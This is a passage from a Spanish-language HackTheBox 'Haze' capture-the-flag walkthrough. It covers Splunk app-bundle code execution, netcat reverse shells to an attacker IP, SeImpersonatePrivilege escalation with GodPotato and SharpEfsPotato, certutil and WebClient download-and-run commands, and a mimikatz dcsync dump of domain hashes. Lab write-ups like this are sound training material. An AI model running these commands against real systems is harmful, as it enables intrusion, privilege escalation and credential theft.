--lhost 10.10.14.105
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpslj2a4as.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.105:8181/
10.10.11.61 - - [03/Apr/2025 06:37:58] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

Logramos el acceso como alexander.green.

1
2
3
4
5
6

❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.105] from haze.htb [10.10.11.61] 53613
PS C:\Windows\system32> whoami
haze\alexander.green
PS C:\Windows\system32>

Privesc

Al enumerar los privilegios de alexander observamos que SeImpersonatePrivilege esta habilitado.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\>

Existen multiples herramientas que permiten la explotacion de este privilegio.

GodPotato

Utilizamos GodPotato para ejecutar una shell inversa utilizando el binario estatico netcat.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

PS C:\Users\alexander.green\Documents> (New-Object Net.WebClient).DownloadFile("http://10.10.14.105/GodPotato-NET4.exe", "C:/Users/alexander.green/Documents/God.exe")
PS C:\Users\alexander.green\Documents> dir


    Directory: C:\Users\alexander.green\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          4/3/2025   6:16 AM          57344 God.exe                                                              


PS C:\Users\alexander.green\Documents> .\God.exe
                                                                                               
    FFFFF                   FFF  FFFFFFF                                                       
   FFFFFFF                  FFF  FFFFFFFF                                                      
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF                
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF                
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF                
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF   
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF  
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF  
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF 
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF 
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF 
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF  
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF   
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF    


Arguments:

	-cmd Required:True CommandLine (default cmd /c whoami)

Example:

GodPotato -cmd "cmd /c whoami" 
GodPotato -cmd "cmd /c whoami" 

PS C:\Users\alexander.green\Documents>

GodPotato no muestra el resultado del comando whoami pero si muestra que el proceso se ejecuto como system.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

PS C:\Users\alexander.green\Documents> .\God.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140721718886400
[*] DispatchTable: 0x140721721477448
[*] UseProtseqFunction: 0x140721720769344
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\44a23618-0b0b-419b-b4c5-a252bc84b188\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004002-04f8-ffff-3bbc-906ee4065f4b
[*] DCOM obj OXID: 0xbc3fdfaaf0e0599c
[*] DCOM obj OID: 0xcfe3ee07cf6d669
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 940 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 7288
PS C:\Users\alexander.green\Documents>

Shell

Realizamos la ejecucion de una shell inversa.

1
2

PS C:\Users\alexander.green\Documents> (New-Object Net.WebClient).DownloadFile("http://10.10.14.105/nc.exe","C:\Users\alexander.green\Documents\nc.exe")
PS C:\Users\alexander.green\Documents> .\gd.exe -cmd "C:\Users\alexander.green\Documents\nc.exe -e cmd.exe 10.10.14.105 1339"

Logramos el acceso a nuestra flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

❯ rlwrap nc -lvp 1339
listening on [any] 1339 ...
connect to [10.10.14.105] from haze.htb [10.10.11.61] 55648
Microsoft Windows [Version 10.0.20348.3328]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami

C:\Windows\system32>cd C:/Users/Administrator/Desktop
cd C:/Users/Administrator/Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3985-943C

 Directory of C:\Users\Administrator\Desktop

03/05/2025  06:46 PM    <DIR>          .
03/05/2025  12:29 AM    <DIR>          ..
04/02/2025  07:02 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,377,016,832 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1ee98fc6b5b51fc7aaa6c2b0f07317a

C:\Users\Administrator\Desktop>

La shell que obtuvimos no muestra el usuario ni privilegios.

1
2
3
4
5
6
7

C:\Windows\system32>whoami
whoami

C:\Windows\system32>whoami /all
whoami /all

C:\Windows\system32>

Lo mismo ocurre al ejecutar una shell con netcat.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

# python PySplunkWhisperer2_remote.py --host 10.10.11.61 --username admin --password 'Sp1unkadmin@2k24' --payload 'certutil.exe -urlcache -split -f http://10.10.14.105/nc.exe C:\Users\alexander.green\Documents\nc.exe && C:\Users\alexander.green\Documents\nc.exe -e cmd.exe 10.10.14.105 1336' --lhost 10.10.14.105
C:\Users\alexander.green\Documents>gd.exe -cmd "cmd /c whoami > C:\Users\alexander.green\Documents\a.txt"
gd.exe -cmd "cmd /c whoami > C:\Users\alexander.green\Documents\a.txt"
[*] CombaseModule: 0x140734260314112
[*] DispatchTable: 0x140734262905160
[..] snip [..]
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2916

C:\Users\alexander.green\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3985-943C

 Directory of C:\Users\alexander.green\Documents

04/09/2025  09:45 AM    <DIR>          .
03/05/2025  12:46 AM    <DIR>          ..
04/09/2025  09:44 AM                 0 a.txt
04/09/2025  09:29 AM            57,344 gd.exe
04/09/2025  09:34 AM            59,392 nc.exe
               3 File(s)        116,736 bytes
               2 Dir(s)   4,215,869,440 bytes free

C:\Users\alexander.green\Documents>type a.txt
type a.txt

C:\Users\alexander.green\Documents>icacls a.txt
icacls a.txt
a.txt NT AUTHORITY\SYSTEM:(I)(F)
      BUILTIN\Administrators:(I)(F)
      HAZE\alexander.green:(I)(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\alexander.green\Documents>

SharpEfsPotato - Privileged

Intentamos con SharpEfsPotato, lo transferimos a la maquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

PS C:\Users\alexander.green\Documents> (New-Object Net.WebClient).DownloadFile("http://10.10.14.105/SharpEfsPotato.exe","C:\Users\alexander.green\Documents\SharpEfsPotato.exe")
PS C:\Users\alexander.green\Documents> .\SharpEfsPotato.exe -h
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

  -p, --prog=VALUE           Program to launch (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -h, --help                 Display this help
PS C:\Users\alexander.green\Documents>

Ejecutamos un whoami, esta vez observamos que lo ejecuta system.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

PS C:\Users\alexander.green\Documents> .\SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\Users\alexander.green\Documents\w.log"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/176f0f62-b5c3-4a7a-954f-e431c7cfb4d6/\176f0f62-b5c3-4a7a-954f-e431c7cfb4d6\176f0f62-b5c3-4a7a-954f-e431c7cfb4d6
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
PS C:\Users\alexander.green\Documents> dir


    Directory: C:\Users\alexander.green\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          4/9/2025   9:29 AM          57344 gd.exe                                                               
-a----          4/9/2025   9:34 AM          59392 nc.exe                                                               
-a----          4/9/2025   9:49 AM          70656 SharpEfsPotato.exe                                                   
-a----          4/9/2025   9:50 AM             21 w.log                                                                


PS C:\Users\alexander.green\Documents> type w.log
nt authority\system
PS C:\Users\alexander.green\Documents>

Shell

Ejecutamos una shell inversa utilizando netcat existente en la maquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

PS C:\Users\alexander.green\Documents> .\SharpEfsPotato.exe -p C:\Users\alexander.green\Documents\nc.exe -a "-e powershell.exe 10.10.14.105 1337"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/3d1e638d-04c8-4542-b035-b7c7355fdf7a/\3d1e638d-04c8-4542-b035-b7c7355fdf7a\3d1e638d-04c8-4542-b035-b7c7355fdf7a
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
PS C:\Users\alexander.green\Documents>

Observamos que nuestra shell ahora si tiene todos los privilegios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

❯ rlwrap nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.105] from haze.htb [10.10.11.61] 58571
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
e1ee98fc6b5b51fc7aaa6c2b0f07317a
PS C:\Windows\system32>

Dump Hashes

Como administrator ejecutamos mimikatz para dumpear los hashes.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

PS C:\Users\Administrator\Documents> certutil.exe -urlcache -split -f http://10.10.14.105/mimikatz.exe mim.exe
certutil.exe -urlcache -split -f http://10.10.14.105/mimikatz.exe mim.exe
****  Online  ****
  000000  ...
  108c00
CertUtil: -URLCache command completed successfully.
PS C:\Users\Administrator\Documents> dir
dir


    Directory: C:\Users\Administrator\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          4/9/2025  10:00 AM        1084416 mim.exe                                                              


PS C:\Users\Administrator\Documents> .\mim.exe
.\mim.exe

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 19 2022 17:43:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::dcsync /domain:haze.htb /ALL /CSV
[DC] 'haze.htb' will be the domain
[DC] 'dc01.haze.htb' will be the DC server
[DC] Exporting domain 'haze.htb'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	937e28202a6cdfcc556d1b677bcbe82c	514
1000	DC01$	9dcbc33adec3bdc8b2334060002ce1b4	532480
500	Administrator	06dc954d32cb91ac2831d67e3e12027f	66048
1111	Haze-IT-Backup$	a70df6599d5eab1502b38f9c1c3fd828	4096
1103	paul.taylor	e90878e2fb0a21a11859ff60f1119fb4	66048
1104	mark.adams	e90878e2fb0a21a11859ff60f1119fb4	66048
1105	edward.martin	09e0b3eeb2e7a6b0d419e9ff8f4d91af	66048
1106	alexander.green	6b8caa0cd4f8cb8ddf2b5677a24cc510	66048

mimikatz #
Share on
Dany Sucuc
WRITTEN BY
sckull

Read other posts

HackTheBox - Haze